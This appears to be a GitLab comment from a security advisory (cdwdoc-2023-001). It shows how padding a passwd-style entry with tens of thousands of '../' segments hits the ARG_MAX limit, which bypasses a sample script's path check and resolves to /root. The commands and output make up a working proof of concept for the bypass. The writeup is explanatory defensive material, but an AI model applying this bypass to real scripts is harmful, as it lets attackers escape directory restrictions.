• This code extracts a string from passwd.txt in the current directory and finally passes it to realpath. before passing it to realpath, the string is checked.

    In the example that will be shown, it is assumed that /home/user1 exists.

    passwd.txt is a bit like /etc/passwd and is intended for data where the first column is the user name and the sixth column is the directory.

    $ echo 'user1:::::/home/user1:/bin/sh' > passwd.txt
    $ ./cdwdoc-2023-001_sample_dir3.sh user1
    /home/user1

    So what happens if the sixth column is something like "/home/user1/../../root"?

    $ echo 'user2:::::/home/user1/../../root:/bin/sh' >> passwd.txt
    $ ./cdwdoc-2023-001_sample_dir3.sh user2
    error: invalid dir

    It is properly recognized as fraudulent. So what happens when we do this?

    $ printf 'user3:::::/home/user1/' >> passwd.txt
    $ yes '../' | head -43685 | tr -d '\n' >> passwd.txt
    $ printf 'root:/bin/sh\n' >> passwd.txt
    $ ./cdwdoc-2023-001_sample_dir3.sh user3
    ./cdwdoc-2023-001_sample_dir3.sh: 9: /bin/echo: Argument list too long
    /root

    We got a "/root" output.

    When trying cdwdoc-2023-001_sample_dir.sh as a stand-alone script from a terminal, the user trying it is themselves affected by the ARG_MAX limit.

    In the case of cdwdoc-2023-001_sample_dir3.sh, the attackers themselves may not be affected by the ARG_MAX limit.

    cdwdoc-2023-001_sample_dir.sh is here: https://gitlab.com/-/snippets/2487375

Supports Markdown
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment